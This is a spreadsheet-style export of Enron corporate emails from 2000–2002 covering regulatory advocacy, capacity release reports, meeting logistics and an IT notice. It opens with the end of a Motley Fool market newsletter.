Chrysler arm of DaimlerChrysler (NYSE: DCX) reported an 8.4%_x000D_
drop, while Honda's (NYSE: HMC) sales fell 5.6% and Toyota_x000D_
(NYSE: TM) experienced a 5.7% downturn. The monthly sales_x000D_
decline was Honda's first since August 1998, and Toyota's first_x000D_
since December 1999._x000D_
_x000D_
GM bucked the trend, reporting a 7% increase in sales. The_x000D_
world's largest automaker increased its U.S. market share to_x000D_
30.3%, up 2.1% since last October. What effect this will have on_x000D_
the company's bottom line is unclear, given that the company_x000D_
aggressively utilized cash-back incentives and low-rate loans,_x000D_
partly in response to similar efforts from Chrysler. Yesterday,_x000D_
GM announced new promotions for its full-size pickups, while_x000D_
Chrysler said earlier this week that it would offer new_x000D_
discounts for its 2001 minivans._x000D_
_x000D_
October's slowdown comes after robust sales earlier this year,_x000D_
and the industry is still on track to beat last year's sales_x000D_
record. Nevertheless, according to a Wall Street Journal report,_x000D_
industry observers now forecast a decline next year, from an_x000D_
estimated 17.2 million units in 2000 to 16.5 million in 2001,_x000D_
and a 5% decline in production from the "Big Three" U.S._x000D_
automakers._x000D_
__________________________________________________________________x000D_
_x000D_
NEWS TO GO_x000D_
_x000D_
Media conglomerate Seagram (NYSE: VO) benefited from strong_x000D_
music and film sales in its fiscal first quarter (ended_x000D_
September 30), with profit from operations reaching $21 million,_x000D_
or $0.05 per share, beating analysts' estimates of $0.03 per_x000D_
share. Revenues dipped 2.9%, however, to $5.34 billion, which_x000D_
the company attributed to the strong dollar and the sales of_x000D_
several businesses. Paris-based Vivendi (NYSE: V) plans to_x000D_
purchase Seagram and this may be the company's last report as an_x000D_
independent entity. Shareholders for Seagram and Vivendi are_x000D_
scheduled to vote on the transaction on December 5, with the_x000D_
acquisition expected to close several days later._x000D_
_x000D_
Gap Inc. (NYSE: GPS) reported another decline in same-store_x000D_
sales yesterday. The largest U.S. clothing chain announced that_x000D_
October same-store sales dropped 2%, thanks to discounts on_x000D_
back-to-school merchandise. CFO Heidi Kunz said that the company_x000D_
expects a "significant" decline in gross margin for the third_x000D_
quarter (ended October 28), according to a Bloomberg report, and_x000D_
that earnings will be between $0.20 and $0.22 per share, below_x000D_
current estimates of $0.23 per share. Prior to lowering_x000D_
expectations in August, estimates were for the company to earn_x000D_
$0.41 per share._x000D_
http://www.fool.com/m.asp?i=179470_x000D_
_x000D_
Domestic queen Martha Stewart Omnimedia (NYSE: MSO) reported_x000D_
strong revenue and earnings growth this morning, thanks to sales_x000D_
increases in the company's publishing, television, and_x000D_
Internet/direct commerce divisions. Net income more than doubled_x000D_
from the year-ago period to $3.8 million, or $0.08 per share,_x000D_
handily beating analysts' estimates of $0.01 per share. Revenue_x000D_
increased 24.2% to $61.9 million, from $49.8 million in last_x000D_
year's third quarter._x000D_
_x000D_
Laser-maker Coherent (Nasdaq: COHR) cut through fourth-quarter_x000D_
analysts' estimates last night, reporting strong sales and_x000D_
earnings growth and sending the company's shares up in_x000D_
after-hours trading. Sales jumped 18% over last year's fourth_x000D_
quarter to $155 million, and net income, excluding an_x000D_
extraordinary gain, was up 56% to $11.4 million, or $0.45 per_x000D_
share. The company was expected to earn $0.36 per share._x000D_
Revenues for the full year were up 21% to $568.3 million, and_x000D_
earnings were up 61% to $36.3 million. Coherent also reported an_x000D_
after-tax gain of $32.3 million from its 60% ownership in a_x000D_
German subsidiary that went public in September._x000D_
__________________________________________________________________x000D_
_x000D_
EDITORS' PICK_x000D_
_x000D_
David Gardner urges you to set a date and plan to be financially_x000D_
independent when you retire._x000D_
http://www.fool.com/m.asp?i=179471_x000D_
________________________________________________________________x000D_
_x000D_
-News &amp; Commentary_x000D_
 http://www.fool.com/m.asp?i=179472_x000D_
_x000D_
-Fool Community_x000D_
 http://www.fool.com/m.asp?i=179473_x000D_
_x000D_
-Post of the Day_x000D_
 http://www.fool.com/m.asp?i=179474_x000D_
_x000D_
-Latest Fribble_x000D_
 http://www.fool.com/m.asp?i=179475_x000D_
_x000D_
-Latest Market Numbers_x000D_
 http://www.fool.com/m.asp?i=179476_x000D_
_____________________________________________________________x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=179477_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=179478_x000D_
My Fool: http://www.fool.com/m.asp?i=179479_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=179480_x000D_
My E-Mail Settings: http://www.fool.com/m.asp?i=179481_x000D_
_x000D_
_x000D_
_x000D_
 Sponsored By: American Express_x000D_
 Trade online with American Express and receive low_x000D_
 commissions, personalized planning tools, free news and_x000D_
 research and 24/7 customer service. Apply Now!_x000D_
 http://www.lnksrv.com/m.asp?i=179482_x000D_
_x000D_
_x000D_
ENROLLMENT EXTENDED!_x000D_
 Our Roadmap to Retirement seminar makes planning_x000D_
 simple. Don't miss out._x000D_
http://www.fool.com/m.asp?i=179483_x000D_
_x000D_
TRY THE ALL-CASH DIET_x000D_
 Get your spending under control with_x000D_
 this report from Soapbox.com._x000D_
http://www.lnksrv.com/m.asp?i=179484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179485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11324-2000-11-02_9-08-51-3293168_2_Plain_MessageAddress.msg-09:14:06(11-02_x000D_
-2000)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: benjamin.rogers@enron.com</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 12:00:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hillis@enron.com'})</t>
  </si>
  <si>
    <t>1st Annual Enron Energy Technology Summit</t>
  </si>
  <si>
    <t>Time		Event					Presenter_x000D_
_x000D_
7:30		Breakfast				_x000D_
8:30		EES Initiatives in Europe	Ron Bertasi_x000D_
9:10		Closing Remarks			Mike Miller_x000D_
9:30		Enron Tour_x000D_
12:00		Golf at Tour 18_x000D_
_x000D_
_x000D_
Bus departs hotel for Tour 18 at 10:45 am - box lunch provided_x000D_
Bus depatts Tour 18 for IAH at 5:30 pm_x000D_
Non-golfers - bus departs hotel for IAH at 10:45</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 07:20:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>External E-Mail Sites</t>
  </si>
  <si>
    <t>Everyone,_x000D_
_x000D_
In an effort to protect our computing systems from viruses and other potential threats, we have disabled the ability to get to external e-mail sites (AOL, Yahoo, Hotmail, etc.) while you are using an Enron computer connected to our network.  _x000D_
_x000D_
If you are using a particular external e-mail site for valid business reasons and this action we have taken has impacted your business, you can contact your Resolution Center for assistance.  Each case will be analyzed for validity and exceptions granted based on business related needs._x000D_
_x000D_
Thank you for your understanding that protecting our revenue generating systems is our highest priority._x000D_
_x000D_
Enron Global Technology</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 09:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Market-Based Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Glad to help--concocting market based rates for storage facilities that _x000D_
probably don't deserve them is one of the few things I know how to do.  DF _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Shelley Corman_x000D_
04/20/2000 12:32 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Market-Based Storage_x000D_
_x000D_
ENA is pursuing a gas storage project.  One assumption of their project _x000D_
development is the ability to attain market-based pricing for the facility.  _x000D_
Tom Shelton called  looking for a primer on how to apply for market-based _x000D_
rates.   I gave him the 10,000 ft story of how any regulated entity can apply _x000D_
for market-based rates under the Alternatives to Traditional Ratemaking _x000D_
policy statement, but that to date only storage facilities have been _x000D_
successful in willing market-based rate treatment.  I think his client is _x000D_
looking for more of a procedural look at what needs to be done.  Do you care _x000D_
if I send  them  a copy of the market-based storage testimony from the last _x000D_
NNG rate case?    Sorry, but I mentioned that you forged market based storage _x000D_
services for Market Hub Partners in your former life.  So, don't be surprised _x000D_
if you hear from Tom Shelton or his client John Allario._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 09:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EXECUTIVE COMMITTEE MEETING - MONDAY, SEPTEMBER 25</t>
  </si>
  <si>
    <t xml:space="preserve">STEVE KEAN -  will be calling in.  _x000D_
_x000D_
If possible, can I get the call in number and passcode by close of business _x000D_
Friday - Steve will leave for business on Sunday.     Thanks.  _x000D_
_x000D_
      Maureen_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please indicate below whether or not you plan to attend this meeting and _x000D_
through what medium. _x000D_
_x000D_
 Yes, I will attend in person ________x000D_
_x000D_
 By video conference from ________x000D_
_x000D_
 By conference call  ____X____x000D_
_x000D_
 No, I will not attend  ________x000D_
_x000D_
*  *  *_x000D_
_x000D_
Please return this e-mail to me with your response by 12:00 p.m., Friday, _x000D_
September 22._x000D_
_x000D_
Thank you, _x000D_
Sherri_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Mar 2002 07:20:57 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Duke $</t>
  </si>
  <si>
    <t>Nice_x000D_
_x000D_
-----Original Message-----_x000D_
From: Parks, Joe _x000D_
Sent: Friday, March 29, 2002 9:09 AM_x000D_
To: McMichael Jr., Ed_x000D_
Cc: Zisman, Stuart_x000D_
Subject: FW: Duke $_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Veariel, Robin _x000D_
Sent: Friday, March 29, 2002 9:03 AM_x000D_
To: Parks, Joe_x000D_
Subject: Duke $_x000D_
_x000D_
_x000D_
03/29/02            FINANCIAL STATUS FOR     03/29/02  10:02         PAGE   2_x000D_
ACCOUNT:  40781075      ENRON N.A. CORP-ENA CASH SRV_x000D_
_x000D_
20208846139 SAME DAY CR TRANSFER                                   2,735,550.05_x000D_
            GID:C0020880869301_x000D_
            CHP0073745_x000D_
            REF:      0209100088JO_x000D_
            BENEF REF:CAP OF 02/03/29_x000D_
            ORDER:    009102771343 DUKE ENERGY FIELD SER_x000D_
            VICES, LP. C/O DUKE ENERGY FIELD SERVICES IN_x000D_
            C P O BOX 5493 DENVER CO 80217-_x000D_
            ORIG BK:  0002 JPMORGAN CHASE BANK_x000D_
            DETAILS:PAYMENT TO ENRON FOR SETTLEMENT_x000D_
            OF STORAGE FEES DUE POST BANKRUPTCY._x000D_
            INSTRUCT DATE:03/29/02 ADVICE TYPE:NONE</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 11:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lipsen@cisco.com'})</t>
  </si>
  <si>
    <t>Re: Broadband Discussion Opportunity &amp; John Chambers</t>
  </si>
  <si>
    <t>Love to catch up.  When you get a minute tomorrow page me (I'm mobile this _x000D_
week) and we can talk.  888.916.7184._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Sat, 29 Sep 2001 14:37:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.giambrone@enron.com', 'beverly.miller@enron.com', 'bert.hernandez@enron.com', 'tracy.minter@enron.com', 'amy.mulligan@enron.com', 'linda.ward@enron.com', 'christine.mcevoy@enron.com'})</t>
  </si>
  <si>
    <t>Transwestern Capacity Release Report - 9/2001</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the Transwestern Capacity Release Report that provides information for September 2001 invoicing.  The spreads to the California border narrowed during the month of September.  Therefore, two of the three index-based packages released by PG&amp;E (Core) are below TW's max tariff rate and the third should be billed using the floor defined on the offer ($0.4455/dth), which does exceed the max tariff rate._x000D_
TW Schedulers - I have left a copy of the flash invoices (processed as of late Friday) for all capacity release transactions and global settlement contracts in Amy's chair for your final disposition.  I have flagged all which may require some additional review/correction on your part.  I will be on a flight out Monday lunchtime for customer training and will not be back in the office until Thursday.  If you have any questions, please feel free to contact me by pager (800-718-0830). _x000D_
 _x000D_
 _x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Dec 2001 13:07:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'vicki.sharp@enron.com', 'alan.aronowitz@enron.com', 'legal &lt;.schuler@enron.com&gt;', 'jordan.mintz@enron.com', 'elizabeth.sager@enron.com', 'b..sanders@enron.com', 't..hodge@enron.com', 'e..haedicke@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Bankruptcy Update</t>
  </si>
  <si>
    <t xml:space="preserve">When: Wednesday, December 05, 2001 5:30 PM-6:30 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: ECS06794_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 07:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>April, 2001 Gathering Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
FYI._x000D_
_x000D_
Bob_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'phillip.allen@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'shelley.corman@enron.com', 'christi.nicolay@enron.com', 'richard.shapiro@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'joe.hartsoe@enron.com', 'donna.fulton@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Final FIled Version</t>
  </si>
  <si>
    <t>----- Forwarded by Sarah Novosel/Corp/Enron on 12/13/2000 05:35 PM -----_x000D_
_x000D_
	"Randall Rich" &lt;rrich@bracepatt.com&gt;_x000D_
	12/13/2000 05:13 PM_x000D_
		 _x000D_
		 To: "Jeffrey Watkiss" &lt;dwatkiss@bracepatt.com&gt;, &lt;jhartso@enron.com&gt;, _x000D_
&lt;jsteffe@enron.com&gt;, &lt;llawner@enron.com&gt;, &lt;rebecca.w.cantrell@enron.com&gt;, _x000D_
&lt;Richard.b.sanders@enron.com&gt;, &lt;snovose@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Final FIled Version_x000D_
_x000D_
_x000D_
The filed version of the comments in the San Diego Gas &amp; Electric matter at _x000D_
FERC is attached._x000D_
_x000D_
 - SANDIEGO.DOC</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 06:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: term sheet &amp; mou</t>
  </si>
  <si>
    <t>Are you here?  I wanted to get those Intergen consents done and out of the _x000D_
way.  Also, DDuran needs to sign the Northwestern guaranty (Oz signed but _x000D_
they want more copies), and I thought it would be best if you initialled._x000D_
_x000D_
ckm</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 10:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stewart.seeligson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'sherri.sera@enron.com'})</t>
  </si>
  <si>
    <t>Talking Points - AT&amp;T</t>
  </si>
  <si>
    <t>Attendees:_x000D_
_x000D_
AT&amp;T:  David Dorman,  President of AT&amp;T (bio points below)_x000D_
_x000D_
Enron:  Jeff Skilling, Stewart Seeligson, David Cox_x000D_
_x000D_
Adventis: Partha Ghosh, Andy Belt and Mark Bruneau (via telephone)_x000D_
_x000D_
_x000D_
Background:_x000D_
_x000D_
As you well know, over the last 9 months EBS has made substantial efforts to _x000D_
establish a significant commercial relationship with AT&amp;T.  Thus far, there _x000D_
have been no transactions between EBS and AT&amp;T other than a couple dozen of _x000D_
circuit purchases by us mostly local loop.  Previously, our primary senior _x000D_
point of contact with AT&amp;T has been Frank Ianna (President of Network _x000D_
Services).  It is probable that Ianna brought only the typical legacy _x000D_
perspective which prevented him from seeing how we could facilitate the AT&amp;T _x000D_
business from a wholesale relationship.  They seemed to only want to sell us _x000D_
services._x000D_
_x000D_
Adventis advises us that Ianna now reports to David Dorman and that Dorman _x000D_
should be able to better understand the value that EBS can bring to further _x000D_
his business objectives.  It is my understanding that it will only be Dorman _x000D_
at the meeting (he is supposedly not bringing Ianna).  I view this meeting as _x000D_
a worthwhile shot to see if it is worth pursuing AT&amp;T at all for the balance _x000D_
of the year for a big transaction.  Dorman's positive receptability to us is _x000D_
the only reason I can see to spend significant resources on AT&amp;T in the near _x000D_
future._x000D_
_x000D_
_x000D_
EBS - AT&amp;T History_x000D_
_x000D_
Jun 2000 EES sponsored Executive Briefing with focus on EES and EBS - _x000D_
attendants include Frank Ianna from AT&amp;T._x000D_
_x000D_
Oct 2000 - Extensive EBS team meets with extensive AT&amp;T team to set up eight _x000D_
tactical and strategic working teams to find opportunities for the   _x000D_
companies to build a bilateral commercial relationship.  After three weeks, _x000D_
results were presented to executive committee of both teams. Nothing _x000D_
materializes._x000D_
_x000D_
Potential Opportunities_x000D_
_x000D_
AT&amp;T currently spends a significant amount each year (expected to be in the _x000D_
$100s of millions) on offnet services (wholesale expenses) .  EBS would like _x000D_
AT&amp;T to allocate a potion of the purchases towards EBS._x000D_
_x000D_
Adventis states there are currently numerous major undertakings by AT&amp;T which _x000D_
are transforming the telecommunications operations at AT&amp;T.  Is there not _x000D_
something EBS could do to help advance these undertakings?_x000D_
_x000D_
At a minimum we would like AT&amp;T to interconnect to our pooling points._x000D_
_x000D_
_x000D_
Final Note_x000D_
_x000D_
I do not think we should lead with trading.  We should lead with our ability _x000D_
to provide services to the wholesale sector of the industry. The typical _x000D_
reaction we get from incumbent players is that if they don't trade or if they _x000D_
think that trading puts downward pressure on prices, then they should not do _x000D_
business with Enron.  They need to understand that they don't need to trade _x000D_
to have a valuable business relationship with  Enron_x000D_
_x000D_
_x000D_
Bio Points on David Darmon_x000D_
_x000D_
Received a bachelors degree in Industrial Management from Georgia Institute _x000D_
of Technology_x000D_
_x000D_
Became the 55th employee at Sprint_x000D_
_x000D_
Rose quickly to become the president of Sprint Business and grew it from $5 _x000D_
million to $4.5 billion in revenue with 10,000 employees._x000D_
_x000D_
Became CEO of Pacific Bell in 1994 at age 39_x000D_
_x000D_
Joined AT&amp;T in 1998 as the CEO of Concert_x000D_
_x000D_
Appointed President of AT&amp;T in 2000_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stewart L. Seeligson_x000D_
Enron Broadband Services_x000D_
713 345-8989</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 01:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: RTO Advocacy Positions</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 02/21/2001 09:47 AM -----_x000D_
_x000D_
	Tim Belden@ECT_x000D_
	02/21/2001 09:33 AM_x000D_
		_x000D_
		 To: James D Steffes/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: RTO Advocacy Positions_x000D_
_x000D_
i concur._x000D_
_x000D_
_x000D_
From: James D Steffes@ENRON on 02/21/2001 09:13 AM CST_x000D_
To: Kevin M Presto/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT_x000D_
cc: Alan Comnes/PDX/ECT@ECT, Christi L Nicolay/HOU/ECT@ECT, Joe _x000D_
Hartsoe/Corp/Enron@Enron, Mary Hain/HOU/ECT@ECT, Sarah _x000D_
Novosel/Corp/Enron@Enron, Steve Walton/HOU/ECT@ECT, Susan J Mara/NA/Enron, _x000D_
Ron McNamara/NA/Enron@Enron, Jeff Brown/NA/Enron@Enron, Steven J _x000D_
Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron _x000D_
Subject: Re: RTO Advocacy Positions  _x000D_
_x000D_
To the discussion I would add the following -_x000D_
_x000D_
1. Our efforts to push hard zonal markets has not been overly successful.  _x000D_
The opponents of such schemes continue to win converts that the interzonal _x000D_
and intrazonal congestion costs will be large and that it is very difficult _x000D_
to get the "right" zones.  Moreover, in markets like ERCOT, the zonal _x000D_
structure has been co-opted by the large incumbents to frustrate the _x000D_
development of the market._x000D_
_x000D_
2. One solution discussed throughout the East is the "Hybrid" model - LMP in _x000D_
the real-time and Flowgates to manage forward transmission congestion.  If _x000D_
structured properly, this allows the power desk to have (a) a real-time _x000D_
energy market and (b) managable transmission risk.  There are disagreements _x000D_
between the policy "experts" about Flowgates (see point 5)._x000D_
_x000D_
3. Our goal is to work within the RTO process and build markets that work for _x000D_
Enron.  Key goals - 1. single control area for the RTO, 2. real time energy _x000D_
market with no penalties for unbalanced positions, 3. market hubs (similar to _x000D_
PJM West) for liquidty, and 4. manageable transmission congestion using _x000D_
market solutions._x000D_
_x000D_
4. I agree with Tim that it is very difficult to come up with "one" perfect _x000D_
market structure proposal for Enron (both for technical and timing reasons - _x000D_
California is in a different place than SPP).  We are trying to coordinate _x000D_
our statements in each of the markets as much as possible.  Most importantly, _x000D_
and we have had some troubles in ERCOT lately, we need to make sure that _x000D_
saying something in one market doesn't damage our other advocacy efforts.  _x000D_
Government Affairs is trying to make sure that we push at the right time and _x000D_
place and ensure that our messages have the necessary context.   _x000D_
_x000D_
5. We still hear some open questions about the best form of market-based _x000D_
congestion managment (option vs. obligation; use it or lose it).  Christi _x000D_
Nicolay is having a call on Friday to discuss these issues.  Please contact _x000D_
her if anyone from your teams should attend._x000D_
_x000D_
Call with any other questions.  At some point, we need to ensure complete _x000D_
agreement of our policy(s) and our advocacy efforts on RTOs._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kevin M Presto@ECT_x000D_
	02/20/2001 06:35 PM_x000D_
		_x000D_
		 To: Tim Belden/HOU/ECT@ECT_x000D_
		 cc: James D Steffes/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Steve _x000D_
Walton/HOU/ECT@ECT, Alan Comnes/PDX/ECT@ECT, Mary Hain/HOU/ECT@ECT_x000D_
		 Subject: Re: RTO Advocacy Positions_x000D_
_x000D_
Are you putting words in my mouth Tim.  _x000D_
_x000D_
The East is absolutely adamant about having a liquid real-time energy markets _x000D_
with a "real supply curve" and a "real demand curve" such that hourly _x000D_
clearing prices reflect the true economic value of the commodity.   With _x000D_
respect to the number of hourly price signals within an RTO that is _x000D_
necessary, that is subject to much debate.   Although I prefer a zonal model _x000D_
for simplicity reasons, the reality is that congestion is more prevalent in _x000D_
the East in most of the markets and in order to get a functioning real time _x000D_
energy market, we may have settle for a limited LMP, in which nodal pricing _x000D_
is necessary for managing the congestion, but proxy buses are created in _x000D_
zones (3-5 per RTO) for purposes of real-time energy markets._x000D_
_x000D_
Our views, I believe, are still very much aligned, however, I need to make _x000D_
some progress on the creation of real time energy markets.   The zonal _x000D_
markets implemented in NEPOOL and contemplated for ERCOT result in a _x000D_
mis-priced commodity with no "real" price signal sent to the market.   Out of _x000D_
merit generation is and will continue to be dispatched because the congestion _x000D_
is managed through energy uplift payments (congestion price signal is not _x000D_
sent to the market).   This results in a very inefficient commodity market _x000D_
where the consumer gets screwed and market makers can't price the commodity _x000D_
or transportation on a forward basis._x000D_
_x000D_
I hope this clarifies any misunderstanding._x000D_
_x000D_
------------------------------------------------_x000D_
_x000D_
Steve Walton was in Portland last week and updated me on the latest vision _x000D_
for RTO's that was developed by the east desk.  This vision seems to differ _x000D_
somewhat from what we are advocating in the west.  In particular, it seems _x000D_
like the east has embraced a nodal system while the west is firmly planted in _x000D_
the zonal / flow-gate camp.  I have asked Steve to flesh out more details of _x000D_
the nodal approach -- in particular, how do the nodes map to a fairly _x000D_
homogeneous zone and how does this impact pure trading positions (i.e., a _x000D_
transaction with no asset being directly scheduled to support it) versus _x000D_
asset-based trades where the meter must settle with the RTO while the trade _x000D_
settles with the market._x000D_
_x000D_
It may be that the physical characteristics of the east and west warrant _x000D_
different models.  For example, the west has large, long-distance, high _x000D_
voltage lines that are very amenable to a zonal approach.  The east has more _x000D_
local transmission bottlenecks that may not be modeled as easily.  It also _x000D_
could be that the political reality in the east and west require different _x000D_
positions.  As things sit now, there is no way that a zonal approach could _x000D_
fly in the northwest.  In contrast, PJM seems firmly planted in the nodal.  _x000D_
Finally, it could be that the east desk and the west desk have a difference _x000D_
of opinion on what the "ideal" market structure should be.  If that is the _x000D_
case, then perhaps we need to talk some more._x000D_
_x000D_
Given the different advocacy positions in the east and the west, I don't _x000D_
think that we can come up with a broad, nationwide advocacy position at this _x000D_
time.  That is, I don't think that we should endorse either zonal or nodal as _x000D_
"the answer" at FERC.  Instead, I think that we should focus on the _x000D_
objectives that RTO's should try to achieve and be flexible as to what the _x000D_
best market structure should be to achieve these objectives._x000D_
_x000D_
What do you guys think about this?_x000D_
_x000D_
Regards,_x000D_
Tim_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 14:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/10/01; HourAhead hour: 22;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/10/01; HourAhead hour: 22;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041022.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 22 / Preferred:  24.00 / Final:  23.99)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/10/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_DESERT_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 04:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>this is for mom_x000D_
_x000D_
i just want some clothes from polo.  or some colonge from polo - called polo _x000D_
sport.  what do you want?</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 08:27:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'tracy.minter@enron.com', 'linda.ward@enron.com', "paul.y'barbo@enron.com", 'laura.giambrone@enron.com', 'christopher.miller@enron.com', 'tk.lohman@enron.com', 'bert.hernandez@enron.com', 'amy.mulligan@enron.com', 'elizabeth.brown@enron.com', 'kimberly.watson@enron.com', 'christine.mcevoy@enron.com', 'paul.cherry@enron.com', 'terry.kowalke@enron.com', 'lynn.blair@enron.com', 'lorraine.lindberg@enron.com', 'john.buchanan@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', 'jeanette.doll@enron.com'})</t>
  </si>
  <si>
    <t>RE: Transwestern Capacity Release Report for the period 1/1/2002 -_x000D_
 12/31/2003</t>
  </si>
  <si>
    <t>As promised, please find the attached TW Capacity Release Report which has been revised to include a release from ENA to Burlington effective 1/11/02 - 1/31/02.  Let me know if you have any questions._x000D_
_x000D_
 _x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brown, Elizabeth  _x000D_
Sent:	Monday, December 31, 2001 12:59 PM_x000D_
To:	Giambrone, Laura; Hernandez, Bert; McEvoy, Christine; Miller, Beverly; Miller, Chris L; Minter, Tracy; Mulligan, Amy; Ward, Linda; Donoho, Lindy; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; Watson, Kimberly; McConnell, Mark; Y'Barbo, Paul; Blair, Lynn; Buchanan, John; Kowalke, Terry; Cherry, Paul; Bianchi, Rita_x000D_
Cc:	Dietz, Rick; Lee, Dennis; Eldridge, Dale; Williams, John_x000D_
Subject:	Transwestern Capacity Release Report for the period 1/1/2002 - 12/31/2003_x000D_
_x000D_
Attached is the Transwestern Capacity Release Report that lists all capacity release transactions for the period effective 1/1/2002.  All transactions were awarded at 100% of the applicable maximum tariff rates.  _x000D_
_x000D_
I have also been advised by Marketing that another posting may occur for January 2001 (partial month) but nothing has been finalized.  I will send an updated file if necessary._x000D_
  _x000D_
If you have any questions, please feel free to contact me._x000D_
_x000D_
 &lt;&lt; File: TW0102P.XLS &gt;&gt; _x000D_
_x000D_
_x000D_
Thanks,_x000D_
Elizabeth</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 10:28:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'larry.berger@enron.com', 'john.buchanan@enron.com', 'karen.brostad@enron.com', 'patricia.steele@enron.com', 'raetta.zadow@enron.com', 'linda.trevino@enron.com', 'terry.kowalke@enron.com', 'zuela.carter@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>RE: Update:  TransCanada --fyi, Upcoming Name Change</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
After the latest discussion with Dennis, I notified Gary Weihrauch that we would need a copy of the amended Certificate of Incorporation.  He is expecting to receive this from his legal department this afternoon.  He will then fax this copy to me -- Dennis, I will walk it down to you._x000D_
_x000D_
Am I correct is assuming the credit clearance is handled elsewhere?_x000D_
_x000D_
Thanks,_x000D_
S._x000D_
 -----Original Message-----_x000D_
From: 	Forbish, Sherry  _x000D_
Sent:	Tuesday, October 23, 2001 12:16 PM_x000D_
To:	Lee, Dennis; Trevino, Linda; Carter, Zuela; Steele, Patricia; Brostad, Karen; Buchanan, John; Kowalke, Terry; Berger, Larry; Zadow, Raetta_x000D_
